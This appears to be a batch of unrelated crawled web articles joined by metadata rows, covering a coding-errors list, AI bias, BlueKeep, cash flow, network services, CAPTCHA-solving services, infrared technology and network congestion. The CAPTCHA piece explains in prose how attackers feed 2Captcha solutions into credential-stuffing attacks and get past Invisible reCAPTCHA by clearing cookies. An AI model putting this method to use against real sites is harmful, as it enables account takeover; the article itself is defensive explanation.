The integrity of hardware and software products is a critical element of cybersecurity, the Office of the Director of US National Intelligence said.
Creating more secure software is a fundamental aspect of system and network security and the top 25 programming errors initiative is an important component of an overall security initiative for our country, it said.
"We applaud this effort and encourage the utility of this tool through other venues such as cyber education," it said.
Top 25 coding errors
- Failure to preserve web page structure ('cross-site scripting')
- Improper sanitisation of special elements used in an sql command ('SQL injection')
- Buffer copy without checking size of input ('classic buffer overflow')
- Cross-site request forgery (CSRF)
- Improper access control (authorisation)
- Reliance on untrusted inputs in a security decision
- Improper limitation of a pathname to a restricted directory ('path traversal')
- Unrestricted upload of file with dangerous type
- Improper sanitisation of special elements used in an OS command ('OS command injection')
- Missing encryption of sensitive data
- Use of hard-coded credentials
- Buffer access with incorrect length value
- Improper control of filename for include/require statement in PHP program ('PHP file inclusion')
- Improper validation of array index
- Improper check for unusual or exceptional conditions
- Information exposure through an error message
- Integer overflow or wraparound
- Incorrect calculation of buffer size
- Missing authentication for critical function
- Download of code without integrity check
- Incorrect permission assignment for critical resource
- Allocation of resources without limits or throttling
- URL redirection to untrusted site ('open redirect')
- Use of a broken or risky cryptographic algorithm
- Race condition
|
<urn:uuid:c2fe0277-8a02-43cc-a22b-17e52eb40bfb>
|
CC-MAIN-2022-40
|
https://www.computerweekly.com/news/1280092135/Top-25-coding-errors-are-your-software-suppliers-secure
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00458.warc.gz
|
en
| 0.87289 | 607 | 2.921875 | 3 |
Machine Learning, Artificial Intelligence, Blockchain, Genome Editing, etc., are some of the sophisticated technologies surrounding us. As has been the case with any technology, they reduce the need for human intervention in business processes. However, they pose new ethical challenges. Technology is created by humans and often reflects human biases. Machine learning models may reflect the biases of designers. Biases may squeeze in due to the approach of data scientists who implement the models. Some AI biases in data may come from data engineers that gather data.
In the book ‘Mitigating Bias in Artificial Intelligence’ the author Berkeley Haas says that “the use of AI in predictions and decision-making can reduce human subjectivity, but it can also embed biases resulting in inaccurate and discriminatory predictions and outputs for certain subsets of the population.”
Addressing bias in AI is a smart move for business as the stakes are high for business leaders. Biased AI systems can produce erroneous and discriminatory predictions. It can impact a business’s reputation and future opportunities and earnings.
Marketers and others depend on AI to a considerable extent to help create the best prospects for a company’s products and services. However, they must take steps to remove any unintentional bias from the AI algorithms. It can prevent their powerful marketing messages from going to potential buyers.
Technology experts advise the following ways of eliminating or at least minimizing AI biases in data.
Reviewing AI Training Data
Understanding training data is vital for any business aiming to make processes more efficient with data-driven results. The main reasons for AI bias are the academic and commercial datasets. Cross-training employees in various departments about the AI bias process and its adverse impact can help combat the problem.
Data scientists can ensure that their data gives an accurate and comprehensive picture of the diversity relayed to the end-users. They analyze all the cases and the cause of action to prevent any discrepancies. Businesses must take a close look at the background and experience of different individuals in the tech team.
Check and Recheck AI’s Decisioning
With manual lead scoring systems, it was relatively easy to inspect and identify the discriminatory elements. In modern AI models, such features may be tough to detect. It takes special training to understand them.
One practical way of enabling AI to be stringent but always transparent is to review the application of the AI. A lot of discussions are happening around the potential bias in AI. Of course, no one agrees that AI is perfect. But AI truly eliminates many system biases introduced by humans.
A scoring model created by humans may be partial to the biased opinions of its developers. Those creating the model may inadvertently select the attributes and engagement actions that may not be entirely foolproof or fair.
AI decisioning needs to allow checking by humans. There is transparency in the usage of AI. But humans and technology can collaborate and make each other accountable to mitigate discrimination.
Receive Input Directly From Customers
Organizations must understand the limitations of their data and then analyze customers’ experiences. The best way of doing this is to actually talk to customers from time to time. Collate and record their personal experiences.
Contact customers by phone or email and encourage them to share their experiences in all honesty. Once the issues are understood, they are analyzed, and the necessary corrective steps are taken. Customer support can document complaints from customers and fix problematic algorithms.
Carrying Out Constant Monitoring
Companies can create a framework for ethical decision-making in data and machine learning projects. This is an effective way of constantly monitoring AI systems and detecting bias. Precautions need to be taken in every phase to prevent bias from creeping into the system. Review and monitoring of output are crucial to keeping bias away.
Organizations that follow this method also keep a close watch on various aspects. These include law, human rights, IP and database rights, data sharing, policies, anti-discrimination laws, etc. Monitoring involves looking at data consumption patterns, data sharing processes, awareness, transparency, consent, and data disclosure transparency.
Better control of AI bias is achieved by tracking ongoing implementation, looking at reviews, and repetitions of data ethics concerns. Companies must also consider the process of data disposal and data deletion.
What Can These Steps Do?
When you apply these changes to your AI processes, they can definitely help mitigate and even eliminate AI bias. But some issues may need technological answers. A multidisciplinary approach is also recommended. Opinions from social scientists and humanities professionals can help in devising better strategies.
Still, these changes alone may not help businesses in certain situations. They possibly need more robust and reliable tools to determine whether a system is good enough for release. These tools also help decide whether to give permission for completely automated decision-making in some situations.
We know that an entirely unbiased AI is unlikely in the real world. AI works on data input generated and provided by humans. There are several human-based prejudices in existence, even in technology. The discovery of new AI biases in data keeps adding to the overall number of biases regularly.
That’s why one can conclude with a degree of firmness that a wholly impartial AI system will never be achieved. However, one can combat this AI bias by testing data and algorithms scrupulously. Companies must apply best practices while gathering and using data and creating AI algorithms.
|
<urn:uuid:59d983d7-a41e-4e1e-926b-f8d964730305>
|
CC-MAIN-2022-40
|
https://www.baselinemag.com/analytics-big-data/best-practices-for-avoiding-ai-biases-in-data-and-why-ts-important/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00458.warc.gz
|
en
| 0.933841 | 1,095 | 3.40625 | 3 |
Microsoft reported in May 2019 something about the BlueKeep exploit. It is a CVE-2019-0708 vulnerability, which is a serious remote code execution flaw identified in Windows Remote Desktop Services. The cybersecurity community anticipated the creation of this weaponized tool and usage in massive attacks. The very first large attacks employing a BlueKeep exploit were uncovered this weekend.
Shortly after Microsoft reported the vulnerability, a lot of security researchers made proof-of-concept exploits specifically for BlueKeep. One such exploit permitted a researcher to remotely take over a vulnerable computer system in only 22 seconds. The researchers postponed publishing their PoC’s because of the criticality of the threat and the volume of devices that could be vulnerable to attack. In the beginning, countless of internet-connected gadgets were in danger, which includes close to one million Internet of Things (IoT) devices.
The BlueKeep vulnerability could be taken advantage of remotely just by transmitting an exclusively created RDP request. User interaction is not necessary to manipulate the vulnerability. The flaw is also like a worm, it’s possible to pass on self-propagating malware from one vulnerable computer to one more on an identical network.
Microsoft announced a number of alerts concerning the vulnerability, which has an effect on earlier Windows versions including Windows Server 2003 and 2008, Windows 7 and Windows XP. Organizations and end-users were told to implement the patch without delay to avert the exploitation of the flaw. The NSA, GCHQ, and other government institutions worldwide issued warnings. The cybersecurity community has likewise notified firms and consumers concerning the threat of attack, with lots of people sensing the creation of a weaponized exploit in just weeks.
Although the patch was available 5 months ago, patching was slow-moving as close to 724,000 devices haven’t used the patch yet. There will be a noticeably bigger total volume of vulnerable devices as scans don’t consist of devices secured by firewalls.
Right after the announcement of the vulnerability, security researcher Kevin Beaumont established a worldwide network of Remote Desktop Protocol (RDP) honeypots that were intended to be attacked. After weeks and months, there was no attempt made to exploit the vulnerabilities. Then on November 2, 2019, researcher Beaumont identified the attack of the honeypots. The first honeypot attack on October 23, 2019 caused the system to crash and reboot, then other attacks followed aside from the Australian honeypot. Although the attack was discovered this weekend, the campaign has actually started at least two weeks ago.
Security researcher Marcus Hutchins, aka MalwareTech examined the crash dumps from the attacks. Hutchins was the guy who found and activated a kill switch to stop the WannaCry ransomware attacks in May 2017. Hutchins located artifacts in the memory revealing the use of the BlueKeep vulnerability to attack the honeypots and shellcode indicating the exploitation of the vulnerability to transmit a cryptocurrency miner, probably for Monero.
Luckily, the hackers were likely low-level threat actors who have never exploited the maximum potential of the vulnerability. They have yet to develop a self-replicating worm and used the vulnerability only to propagate cryptocurrency mining malware on vulnerable devices through an internet-exposed RDP port. The attacker(s) likely used a BlueKeep exploit that was released on the Metasploit framework in September.
Because of the honeypot system and the failure to use the vulnerability on all 11 honeypots, it’s likely that the exploit is not working as planned and has not been altered so that it works properly. Nevertheless, this is a massive attack and some attacks were.
The BlueKeep vulnerability had been exploited before by threat actors in smaller sized more focused attacks with success, but this is the first massive-exploitation of BlueKeep.
If threat actors learn how to exploit the full potential of the BlueKeep vulnerability and develop a self-propagating worm, all unpatched devices can be attacked, even those on internal networks. Those attacks will not just slow down computers while mining cryptocurrency. Wiper attacks identical to NotPetya may also possibly be conducted. The shipping firm Maersk spent about $300 million because of the attack.
Stopping these attacks is easy. Apply Microsoft’s patch on all affected computers as soon as possible.
|
<urn:uuid:87bec5a1-bd09-42b1-822a-41a644346532>
|
CC-MAIN-2022-40
|
https://www.calhipaa.com/microsoft-announcement-on-bluekeep-vulnerability-in-real-world-attacks/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00458.warc.gz
|
en
| 0.957872 | 876 | 2.53125 | 3 |
Cash is the beating heart of any successful business, and for most organizations, cash flow will have the most impact on performance and longevity. Some businesses fail, but most businesses who have collapsed by the 3-year mark can usually attribute their failure to poor cash flow management.
Underestimating the importance of cash flow modelling can weaken the sustainability of an organization, so it's crucial to understand from the outset how a cash flow model works and why you need one.
Read more about the importance of managing your cash flows with the everchanging payments industry. Download our guide today.
What is a cash flow model?
Cash flow modelling creates visibility into a company's assets, income, expenditure, debts and investments as an indicator of its future business performance, and its most important business goal; solvency.
Cash flow modeling enables businesses to plan for the future, as well as potential market fluctuations, and even an economic recession.
Every business's cash flow modelling strategy is different, so it's impossible to create a one-size-fits-all strategy execution, but a cash flow forecast model should start by taking into consideration three crucial factors:
- Beginning cash balance: The total cash on hand you expect to have at the beginning of the month.
- Cash inflows: The cash coming into your business from operations, investments, or financing (through debt or equity).
- Cash outflows: All of the cash being spent through the business, including utilities, loan payments, rent, payroll, taxes, and all operating expenses.
The most effective cash flow forecasts always include current information, as well as a variety of possible future scenarios. To achieve this, businesses need complete access to insights, data and analytics.
Full visibility on cash flow empowers businesses to plan for the future, anticipate potential issues and avoid reliance on loans and credit card debt.
Read our guide to monitoring and improving cash flow visibility here
What is cash flow forecasting?
A cash flow forecast helps a business plan for the future. A good cash flow forecast model estimates a business’s future financial position and helps ensure that it will have the necessary amount of cash to meet future obligations and better manage working capital.
Key financial reports such as an income statement (or profit and loss statement) only looks at sales and expense activity, while a balance sheet reports on assets, liabilities or contributions of equity.
A cash flow forecast on the other hand includes all movements of cash in and out of a business within a given time period. This helps ensure there is enough operating cash flow, and that the working capital is managed as effectively as possible.
How can cash flow forecasting benefit a business?
Business owners make difficult financial decisions every day. Cash flow forecasting is an essential part of business planning for a number of key reasons, and can help relieve the burden of cash flow management. The main advantages of a good cash flow forecast model include:
Late payments from customers and clients can affect cash flows enormously. But modeling alternative scenarios can help businesses to understand future plans, possible outcomes, and how various situations will impact their cash inflows.
Monitoring overdue payments
While consistent overdue payments can dearly affect a business, having insight into later payers, and the impact they have on the bottom line can help formulate plans for more effective credit control.
Managing surplus cash
For many businesses, it’s rare to see excess cash in the bank, but utilizing additional cash for reinvestment in new markets, or for the repayment of loans, can be essential to maintain actual cash flow.
Tracking whether spending is on target
Every business has revenue goals and targets that are time-sensitive. But cash forecasts can help a business owner to understand exactly when and if they will reach those goals, and increase the accuracy of future budgeting.
Keeping investors and stakeholders informed
Good governance is vital to the success and longevity of any business. A detailed cash flow model forecast offers additional insight into the potential of a business encouraging confidence and the reassurance that their investment will be safe.
Identifying potential problems
With forecasting as part of your cash flow model, you can anticipate surpluses and shortages to help with decision making about whether to increase focus on collections, or to seek a line of credit.
Forecasting helps manage all aspects of a business's financial position, including how much cash is coming in from revenue streams, where it’s being spent on operating expenses, and the number of funds available after fulfilling these obligations.
Cash flow forecasting can help navigate the current climate within an industry and help businesses prepare for cash shortage situations like holidays & vacation periods that could affect a company’s bottom line.
The ability to forecast cash flow enables organizations to stay ahead of cash flow needs by identifying when more capital is needed to cover expenses and payroll commitments.
Financial analysis, planning and budgeting
A robust system for managing income and expenses is crucial for any business. A cash flow forecast can be complicated, because it involves measuring and monitoring many variables - and making predictions about performance.
But businesses need a sturdy financial model to know how much money is cycling through the company at any given time, and what cash is expected, to create a budget. Budgeting gives a detailed view of what income and capital expenditure a business can expect, and what might need to be cut.
Business leaders should spend time with their finance and accounting department as they build their financial model. It's essential to have a full understanding of accounts receivable and accounts payable. Here are some things to review:
- Variable costs (labor and raw materials, for example)
- Fixed costs (rent, utilities, certain salaries and business insurance)
- Other significant expenses (investments in equipment or software).
Enhanced analysis and a regular examination of cash positions will increase the accuracy of of a business's financial position.
Many businesses experiences some seasonality. There could be months when clients are more active in purchasing a company's products or services. Seasonality can have a material effect on expected future cash flows. A good cash flow forecast will anticipate when cash outflows and cash receipts are higher or lower, allowing better management of the working capital needs of the company.
For example, a retailer specializing in swimwear and accessories would obviously experience a higher selling season throughout Spring and Summer. But with the store open all year round, the business will still incur operating expenses such as rent, utilities, and labor.
This means that sales and profits during the summer months must be enough to cover all annual expenses, including working capital to purchase goods (inventory) to sell in the coming selling season. It’s the timing of these transactions that makes budgeting decisions especially complex.
A detailed view of a cash flow statement shows the timing and amounts of revenue and expenses that affect cash flows.
How often should a business do a cash flow forecast?
Cash flow is a changing metric, and it needs to be monitored frequently over a given period. build cash flow forecasts for the short (weekly or monthly), medium (quarterly) and long (yearly) term. The needs of the business will dictate which time frame is the most valuable. A monthly cash flow forecast is recommended by financial experts at the very least, but possibly more frequently in times of economic instability.
A monthly cash flow forecast, or quarterly forecasts are generally more useful for stable, established businesses. Weekly projections will be essential for companies scaling up or going through significant changes, such as a restructuring or merger/acquisition.
What is Discounted Cash Flow (DCF)?
Discounted cash flow is a method used to estimate the value of an investment based on its expected future cash flows. DCF analysis attempts to determine the current value of an investment, based on projections of how much money it will generate in the future. The present value of expected future cash flow is determined by using a discount rate to calculate the DCF.
This applies to the decisions of investors in companies or securities, for example when acquiring a company or buying a stock, and for business owners and managers looking to make capital budgeting or operating expenditures decisions. If the discounted cash flow is above the current cost of the investment, the opportunity could result in positive returns.
Why cash flow analysis is vital
Business leaders look at cash flow numbers as an indication of how well -or how badly - their business is performing. Cash flow analysis reveals any patterns or trends that can help address deficiencies or expand on strengths within a business.
Read our detailed report on why every business should do cash flow analysis here
Image source: Wall Street Mojo
The importance of insights and analytics in cash flow modeling
Organizations who have visibility into their current and projected liquidity positions are undoubtedly in a better position to manage business continuity than those who don't.
With real time dashboards to display live data, analyzing cash flow is as easy as pressing a button to generate reports. Senior management can then use this data to provide them with the tools to make better informed financial and risk assessment decisions.
IR Transact simplifies the complexity of managing modern payments ecosystems, bringing real-time visibility and access to your payments system.
Businesses can gain unlimited access and insights into money flows, customer usage data, and end-to-end transaction performance metrics, offering a thousand points of reference, from a single point of view.
The ability to view an organization's entire payments ecosystem provides management with solutions to problems, which ultimately leads to an increase in profitability.
|
<urn:uuid:475167af-a55a-4e11-8cea-82ee5795751a>
|
CC-MAIN-2022-40
|
https://www.ir.com/guides/cash-flow-modeling
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00458.warc.gz
|
en
| 0.947558 | 1,943 | 2.609375 | 3 |
You can also create service hierarchies by creating sub-services. The state of a sub-service contributes to the state of its parent service. This means you can model complex services with multiple contributing sub-services.
Service as a managed object
A service acts as a managed object, to which you can associate the components that deliver that service. A service definition determines e.g.:
- how the states of components in the service should be interpreted, in order to set the state of the service.
- whether a change in the state of the service would raise an event.
- the SLA goal, i.e. the minimum % of component availability for acceptable delivery of service.
Services have a state to denote their current condition. The state of a service depends on its service logic.
Up - when the number of components required by the service logic for the service to be up are in an up state.
Degraded - when the service logic is set to 'At Least', and the number of components is in an up state are as few as the 'Degraded Threshold' number but less than the 'At Least' number required for the service to be up.
Down - this depends on the logic used for the service, generally when one or more of the components that contributes to the service's overall state are down that are required by the service's logic to be up for the service to be operating normally.
Unknown - when Entuity cannot determine the status of one or more of the components in the service that contribute to the service's overall state, and therefore the overall service state is unknown.
None - when the service does not return a state - in the service logic, there is an option to specify 'None', which is the equivalent of turning off the service.
Associating components to a service
The components you can associate to a service include:
- devices with associated components, e.g. ports.
- devices without associated components.
- servers as managed devices.
- IP SLA operations.
- components of devices, e.g. fans, PSUs and temperature sensors.
- other services which allows you to build a service hierarchy.
When populating a service with components, you can add components to the View and the service, or just the service alone. If a component is added to a service alone, it will become available to the user even if they do not have permission to see a View to which the component belongs.
Managing your services
Services can be managed through:
- Services dashboard and services dashlets.
- Services reports:
- CIO Perspective report includes a Services Summary and access to the Server Availability report.
To create a service within a View, you must have the appropriate permission to access the View, the View edit permission, and the Service Administration permission.
Administrators can create subservices (services that are created within a service). Administrators can also assign service ownership to non-administrators.
Users with the Service Administration tool permission can edit and delete services, including top-level services. When a non-administrator is the owner of a service, they can create subservices within it. Users with the appropriate permission can also:
- add components to a service (and therefore to the View).
- remove components from a service.
In both cases, this could amend the access scope of other user groups associated with the View, and so Administrators should be aware of this when assigning permissions for services.
Multi-server and remote objects in services
Services are defined against a selected View, or against the selected Entuity server (which is effectively against the All Objects View on that server). Services can only be defined against one View or one server, but can include sub-services from different servers. Therefore service hierarchies can be split across multiple servers, although Entuity discourages this because service updates will be more reliable and responsive if all the service's objects are on the same server.
If you access more than one Entuity server, Entuity does not consolidate services across those servers. E.g. if two services across two servers share the same name, they will remain separate services.
Services can contain components that are under management by another Entuity server. In this case, Entuity creates a local record of the remote object details, to identify the component and its state. Users with appropriate permissions can access more details through the remote server, but users without the appropriate permissions cannot.
Entuity has 2 methods of maintaining the state of remote objects:
- Every 10 minutes, the local server that is managing the service checks the remote server for the presence and state of the object. If the local server loses contact with the remote server, then the state of the remote object becomes unknown after 10 minutes.
- The remote server maintains a record of Entuity servers using objects under its management in their services. If one of these objects changes state, the remote server notifies the local server that is managing the service.
If remote object states are only updating every 10 minutes, this indicates a firewall is preventing incoming messages initiated by the remote server, but is allowing updates that were initiating by the local server managing the services.
|
<urn:uuid:4d13fc67-db3d-49c1-a319-ea3a014bb1f8>
|
CC-MAIN-2022-40
|
https://support.entuity.com/hc/en-us/articles/360007311614-What-are-services-
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00658.warc.gz
|
en
| 0.919676 | 1,093 | 2.515625 | 3 |
European Commission (EC), the executive branch of the European Union (EU), is among a number of EU institutions targeted by a cyberattack last month, the organization has confirmed.
As reported by Bleeping Computer (opens in new tab), what’s known so far is that the attackers did not manage to break into EC systems and did not make away with any sensitive data. However, forensic analysis of the event is still ongoing and new information may yet emerge.
The EC set up a non-stop service that aims to eliminate any issues in the aftermath of the attack.
"We are working closely with CERT-EU, the Computer Emergency Response Team for all EU institutions, bodies and agencies and the vendor of the affected IT solution," an EC spokesperson told BleepingComputer. "The Commission has set up a 24/7 monitoring service and is actively taking mitigating measures,” it was added.
Information on the event is limited and the identity of the group behind the attack remains unknown. Neither do we know how the attack took place, what tools and tactics were used, nor what the attackers motives may have been.
According to Bloomberg (opens in new tab), the attack was bigger than what the EC usually experiences usually; big enough for the senior officials to be alerted. The same source claims EU staff are being alerted to potential phishing attempts.
- Here are the best antivirus software (opens in new tab)
|
<urn:uuid:e243f60f-74ad-4abb-831b-6070fee9d413>
|
CC-MAIN-2022-40
|
https://www.itproportal.com/news/european-commission-targeted-by-cyberattack/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00658.warc.gz
|
en
| 0.963803 | 291 | 2.65625 | 3 |
The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), was originally designed to prevent bots, malware, and artificial intelligence (AI) from interacting with a web page. In the 90s, this meant preventing spam bots. These days, organizations use CAPTCHA in an attempt to prevent more sinister automated attacks like credential stuffing.
Almost as soon as CAPTCHA was introduced, however, cybercriminals developed effective methods to bypass it. The good guys responded with “hardened” CAPTCHAs but the result remains the same: the test that attempts to stop automation is circumvented with automation.
There are multiple ways CAPTCHA can be defeated. A common method is to use a CAPTCHA solving service, which utilizes low-cost human labor in developing countries to solve CAPTCHA images. Cybercriminals subscribe to a service for CAPTCHA solutions, which streamline into their automation tools via APIs, populating the answers on the target website. These shady enterprises are so ubiquitous that many can be found with a quick Google search, including:
This article will use 2Captcha to demonstrate how attackers integrate the solution to orchestrate credential stuffing attacks.
Upon accessing the site 2Captcha.com, the viewer is greeted with the image below, asking whether the visitor wants to 1) work for 2Captcha or 2) purchase 2Captcha as a service.
To work for 2Captcha, simply register for an account, providing an email address and PayPal account for payment deposits. During a test, an account was validated within minutes.
New workers must take a one-time training course that teaches them how to quickly solve CAPTCHAs. It also provides tips such as when case does and doesn’t matter. After completing the training with sufficient accuracy, the worker can start earning money.
After selecting “Start Work,” the worker is taken to the workspace screen, which is depicted above. The worker is then provided a CAPTCHA and prompted to submit a solution. Once solved correctly, money is deposited into an electronic “purse,” and the worker can request payout whenever they choose. There is seemingly no end to the number of CAPTCHAs that appear in the workspace, indicating a steady demand for the service.
2Captcha workers are incentivized to submit correct solutions much like an Uber driver is incentivized to provide excellent service—customer ratings. 2Captcha customers rate the accuracy of the CAPTCHA solutions they received. If a 2Captcha worker’s rating falls below a certain threshold, she will be kicked off the platform. Conversely, workers with the highest ratings will be rewarded during times of low demand by receiving priority in CAPTCHA distribution.
To use 2Captcha as a service, a customer (i.e., an attacker) integrates the 2Captcha API into her attack to create a digital supply chain, automatically feeding CAPTCHA puzzles from the target site and receiving solutions to input into the target site.
How would an attacker use 2Captcha in a credential stuffing attack? The diagram below shows how the different entities interact in a CAPTCHA bypass process:
Combined with web testing frameworks like Selenium or PhantomJS, an attacker can appear to interact with the target website in a human-like fashion, effectively bypassing many existing security measures to launch a credential stuffing attack.
With such an elegant solution in place, what does the financial ecosystem look like, and how do the parties each make money?
Working as a CAPTCHA solver is far from lucrative. Based on the metrics provided on 2Captcha’s website, it’s possible to calculate the following payout:
Assuming it takes 6 seconds per CAPTCHA, a worker can submit 10 CAPTCHAs per minute or 600 CAPTCHAs per hour. In an 8 hour day that’s 4800 CAPTCHAs. Based on what was earned during our trial as an employee for 2Captcha (roughly $0.0004 per solution), this equates to $1.92 per day.
This is a waste of time for individuals in developed countries, but for those who live in locales where a few dollars per day can go relatively far, CAPTCHA solving services are an easy way to make money.
The attacker pays the third party, 2Captcha, for CAPTCHA solutions in bundles of 1000. Attackers bid on the solutions, paying anywhere between $1 and $5 per bundle.
Many attackers use CAPTCHA-solving services as a component of a larger credential stuffing attack, which justifies the expense. For example, suppose an attacker is launching an attack to test one million credentials from Pastebin on a target site. In this scenario, the attacker needs to bypass one CAPTCHA with each set of credentials, which would cost roughly $1000. Assuming a 1.5% successful credential reuse rate, the attacker can take over 15,000 accounts, which can all be monetized.
2Captcha receives payment from the Attacker on a per 1000 CAPTCHA basis. As mentioned above, customers (i.e. attackers) pay between $1 and $5 per 1000 CAPTCHAs. Services like 2Captcha then take a cut of the bid price and dole out the rest to their human workforce. Since CAPTCHA solving services are used as a solution at scale, the profits add up nicely. Even if 2Captcha only receives $1 per 1000 CAPTCHAs solved, they net a minimum of 60 cents per bundle. The owners of these sites are often in developing countries themselves, so the seemingly low revenue is substantial.
In March of this year, Google released an upgraded version of its reCAPTCHA called “Invisible reCAPTCHA.” Unlike “no CAPTCHA reCAPTCHA,” which required all users to click the infamous “I’m not a Robot” button, Invisible reCAPTCHA allows known human users to pass through while only serving a reCAPTCHA image challenge to suspicious users.
You might think that this would stump attackers because they would not be able to see when they were being tested. Yet, just one day after Google introduced Invisible reCAPTCHA, 2CAPTCHA wrote a blog post on how to beat it.
The way Google knows a user is a human is if the user has previously visited the requested page, which Google determines by checking the browser’s cookies. If the same user started using a new device or recently cleared their cache, Google does not have that information and is forced to issue a reCAPTCHA challenge.
For an attacker to automate a credential stuffing attack using 2Captcha, he needs to guarantee a CAPTCHA challenge. Thus, one way to bypass Invisible reCAPTCHA is to add a line of code to the attack script that clears the browser with each request, guaranteeing a solvable reCAPTCHA challenge.
The slightly tricky thing about Invisible reCAPTCHA is that the CAPTCHA challenge is hidden, but there is a workaround. The CAPTCHA can be “found” by using the “inspect element” browser tool. So the attacker can send a POST to 2Captcha that includes a parameter detailing where the hidden CAPTCHA is located. Once the attacker receives the CAPTCHA solution from 2Captcha, Invisible reCAPTCHA can be defeated via automation in one of two ways:
The fact that Invisible reCAPTCHA can be bypassed isn’t because there was a fatal flaw in the design of the newer CAPTCHA. It’s that any reverse Turing test is inherently beatable when the pass conditions are known.
As long as there are CAPTCHAs, there will be services like 2Captcha because the economics play so well into the criminal’s hands. Taking advantage of low cost human labor minimizes the cost of doing business and allows cybercriminals to reap profits that can tick upwards of millions of dollars at scale. And there will always be regions of the world with cheap labor costs, so the constant demand ensures constant supply on 2Captcha’s side.
The world doesn’t need to develop a better CAPTCHA, since this entire approach has fundamental limitations. Instead, we should acknowledge those limitations and implement defenses where the pass conditions are unknown or are at least difficult for attackers to ascertain.
Holmes, Tamara E. “Prepaid Card and Gift Card Statistics.” CreditCards.com. Creditcards.com, 01 Dec. 2015. Web.
Hunt, Troy. “Breaking CAPTCHA with Automated Humans.” Blog post. Troy Hunt. Troy Hunt, 22 Jan. 2012. Web.
Motoyama, Marti, Kirill Levchenko, Chris Kanich, and Stefan Savage. Re: CAPTCHAs–Understanding CAPTCHA-solving Services in an Economic Context. Proc. of 19th USENIX Security Symposium, Washington DC. Print.
|
<urn:uuid:b8b2d5f8-8f86-44a6-a844-8c2b1dabea25>
|
CC-MAIN-2022-40
|
https://www.f5.com.cn/company/blog/how-cybercriminals-bypass-captcha
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00658.warc.gz
|
en
| 0.930381 | 1,923 | 3.265625 | 3 |
You may be familiar with the infrared technology, but you may be unsure of how it works or the limitless possibilities it possesses. Infrared is used in many everyday applications including simple things like using a remote control, communications, and even the reading the weather. However, you my be unaware that infrared technology can do things like see if you are drunk, treat ailments like arthritis and pain, or heal oral ulcers which are a side effect of chemotherapy. Indeed, infrared technology can be used on more than just security cameras and night vision. The possibilities are seemingly limitless.
Infrared technology works by using electromagnetic radiation to translate temperatures into different colors. The term infrared combines the English word red, and the Latin word infra which translates to below. This is because infrared light's frequency is below red light. Red is the longest wavelength visible to our human eyes, therefore rendering infrared waves invisible. However, advanced technologies can see these wavelengths for us so we may make them useful.
This is why infrared cameras are so beneficial to us as humans. Places with poor lighting will result in more thieves and crooks targeting that area. Cameras with lights mounted on top of them will prove to be completely useless if criminals can just find a way around it. A bright enough light in a dark area like a basement may be expensive to maintain, and will corrode with time. Therefore, the solution is to find a technology that can see in the dark. This is just oe of many amazing applications infrared has to offer. Even though infrared technology has been used for several years now, more and more possibilities for it are always being discovered.
Overall, infrared technology does many things to keep us safe and protected. Advancements in the medical field make it possible to infrared to relieve us from debilitating pain and heal oral ulcers caused by chemotherapy. It can also be used to target areas on a plane's wings which are starting to freeze, preventing dangerous circumstances. It is used to see the weather via satellites which will prevent accidents in case of snow, ice, or excessive rain. It can keep us safe in the dark from potential intruders and be a second pair of eyes if anything goes wrong. Infrared is so entwined in our lives that it feels natural, and future possibilities for it are endless.
|
<urn:uuid:ab593141-5dc8-4af9-a698-df25ef226c9f>
|
CC-MAIN-2022-40
|
https://www.getscw.com/blog/1996/limitless-applications-of-infrared-technology
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00658.warc.gz
|
en
| 0.949409 | 462 | 2.703125 | 3 |
Network congestion on any IT infrastructure is a growing concern. Whether for a simple file transfer, or displaying a video conference, an organization's day-to-day IT tasks are entirely dependent on the network's health. A slight data overload in your network might cause sluggish connectivity, poor data quality, and undesirable issues. If not tended to immediately, chances are high that the organization's operations will grind to a halt. To understand the effects of network congestion better, let's dive deep into knowing what exactly it is, and where it comes from.
Network congestion occurs when the network carries or exchanges data beyond its capacity. As a result, the network might experience delays in processing information, or lose packets. Ultimately, the network won't perform to its expectations.
There are a few symptoms that indicate your infrastructure is experiencing network congestion:
High latency: Latency is a measure of the delay for the data packets to travel from its source to a destination. Usually, latency occurs because the network needs to exchange data beyond its bandwidth capacity.
The narrower the bandwidth pipeline, the more congested the data flow will be. Therefore, high latency reduces the bandwidth effectiveness and obviously network congestion.
Jitter: Packets transmitting through a physical distance can take a shorter or longer time to reach the destination. This difference in arrival times is what we call the jitter.
Jitter and congestion go hand-in-hand when the network support device, like a router or a gateway, tries to adjust to the traffic variance. In a VoIP call, for example, jitter is indicated when a video displays choppily or the audio plays slowly, quickly, or intermittently.
Packet Loss: This occurs when data packets are interrupted when trying to reach their destination. When your network can't receive more packets since its capacity has fallen far behind, it will ignore other incoming packets. Packet loss can produce choppy audio or video during VoIP calls, reduced throughput, and more quality degradations.
There are a myriad of aspects in your network infrastructure that can impact your network's stability. Let's look at some reasons network congestion occurs.
Bandwidth capacity: Your network doesn't meet your expectations because of the misuse of bandwidth. For instance, your business has a set of critical applications or devices that might require the most bandwidth. However, a significant amount of bandwidth might also be utilized for video streaming or gaming. Automatically, your resources might get limited for specific purposes, and this could result in performance issues.
Malicious attacks: Corporate networks often witness traffic peaks, and might mistake it to be their typical business interaction or request. In most cases, the unexpected traffic is from malicious websites that intrude into the system to accelerate network downtime. DoS and flash attacks can be disguised as requests, and this additional traffic brings all business processes to a standstill.
Network design: Resulting from not just bandwidth capacity or misconfigured traffic issues, but network congestion might also occur when the network infrastructure is not implemented correctly. This is especially true when the network is divided into subnets or SSIDs. The correct infrastructure is necessary for an efficient network and data transmission. Every business has different requirements, and network designs must be accomplished to ensure it is easy for service monitoring and troubleshooting.
